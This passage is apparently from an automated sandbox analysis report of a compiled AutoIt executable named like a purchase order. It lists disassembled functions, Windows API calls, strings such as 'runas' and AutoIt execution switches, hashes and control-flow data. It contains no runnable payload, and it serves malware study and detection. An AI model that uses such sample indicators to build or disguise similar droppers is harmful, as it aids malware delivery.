                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                  Strings
                                                                  • runas, xrefs: 0042E2AD, 0042E2DC
                                                                  • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                  • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                  • API String ID: 2495805114-3383388033
                                                                  • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                  • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                  Function 0040E500 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1004 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1013 40e582-40e583 1004->1013 1014 427674-427679 1004->1014 1017 40e585-40e596 1013->1017 1018 40e5ba-40e5cb call 40ef60 1013->1018 1015 427683-427686 1014->1015 1016 42767b-427681 1014->1016 1021 427693-427696 1015->1021 1022 427688-427691 1015->1022 1020 4276b4-4276be 1016->1020 1023 427625-427629 1017->1023 1024 40e59c-40e59f 1017->1024 1035 40e5ec-40e60c 1018->1035 1036 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1018->1036 1037 4276c6-4276ca GetSystemInfo 1020->1037 1021->1020 1027 427698-4276a8 1021->1027 1022->1020 1029 427636-427640 1023->1029 1030 42762b-427631 1023->1030 1025 40e5a5-40e5ae 1024->1025 1026 427654-427657 1024->1026 1031 40e5b4 1025->1031 1032 427645-42764f 1025->1032 1026->1018 1038 42765d-42766f 1026->1038 1033 4276b0 1027->1033 1034 4276aa-4276ae 1027->1034 1029->1018 1030->1018 1031->1018 1032->1018 1033->1020 1034->1020 1040 40e612-40e623 call 40efd0 1035->1040 1041 4276d5-4276df GetSystemInfo 1035->1041 1036->1035 1048 40e5e8 1036->1048 1037->1041 1038->1018 1040->1037 1046 40e629-40e63f call 40ef90 GetNativeSystemInfo 1040->1046 1050 40e641-40e642 FreeLibrary 1046->1050 1051 40e644-40e651 1046->1051 1048->1035 1050->1051 1052 40e653-40e654 FreeLibrary 1051->1052 1053 40e656-40e65d 1051->1053 1052->1053
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                  • String ID: 0SH$#v
                                                                  • API String ID: 3363477735-2448020801
                                                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                  Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: IsThemeActive$uxtheme.dll
                                                                  • API String ID: 2574300362-3542929980
                                                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                  Function 0040D6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FreeInfoLibraryParametersSystem
                                                                  • String ID: #v
                                                                  • API String ID: 3403648963-554117064
                                                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                  Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                  • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                  • TranslateMessage.USER32(?), ref: 00409556
                                                                  • DispatchMessageW.USER32(?), ref: 00409561
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Peek$DispatchSleepTranslate
                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                  • API String ID: 1762048999-758534266
                                                                  • Opcode ID: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                  • Opcode Fuzzy Hash: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                  Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • __wcsicoll.LIBCMT ref: 00402007
                                                                  • __wcsicoll.LIBCMT ref: 0040201D
                                                                  • __wcsicoll.LIBCMT ref: 00402033
                                                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                  • __wcsicoll.LIBCMT ref: 00402049
                                                                  • _wcscpy.LIBCMT ref: 0040207C
                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                  • API String ID: 3948761352-1609664196
                                                                  • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                  • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                  Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                  • _wcsncat.LIBCMT ref: 0040E433
                                                                  • __wmakepath.LIBCMT ref: 0040E44F
                                                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  • _wcscpy.LIBCMT ref: 0040E487
                                                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                  • _wcscat.LIBCMT ref: 00427541
                                                                  • _wcslen.LIBCMT ref: 00427551
                                                                  • _wcslen.LIBCMT ref: 00427562
                                                                  • _wcscat.LIBCMT ref: 0042757C
                                                                  • _wcsncpy.LIBCMT ref: 004275BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                  • String ID: Include$\
                                                                  • API String ID: 3173733714-3429789819
                                                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                  Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _fseek.LIBCMT ref: 0045292B
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                  • __fread_nolock.LIBCMT ref: 00452961
                                                                  • __fread_nolock.LIBCMT ref: 00452971
                                                                  • __fread_nolock.LIBCMT ref: 0045298A
                                                                  • __fread_nolock.LIBCMT ref: 004529A5
                                                                  • _fseek.LIBCMT ref: 004529BF
                                                                  • _malloc.LIBCMT ref: 004529CA
                                                                  • _malloc.LIBCMT ref: 004529D6
                                                                  • __fread_nolock.LIBCMT ref: 004529E7
                                                                  • _free.LIBCMT ref: 00452A17
                                                                  • _free.LIBCMT ref: 00452A20
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1255752989-0
                                                                  • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                  • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                  Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock$_fseek_wcscpy
                                                                  • String ID: FILE
                                                                  • API String ID: 3888824918-3121273764
                                                                  • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                  • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                  Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                  • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                  • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                  • ImageList_ReplaceIcon.COMCTL32(0093DD48,000000FF,00000000), ref: 00410552
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                  Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                  • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                  • RegisterClassExW.USER32(?), ref: 0041045D
                                                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                    • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                    • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                    • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                    • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                    • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(0093DD48,000000FF,00000000), ref: 00410552
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
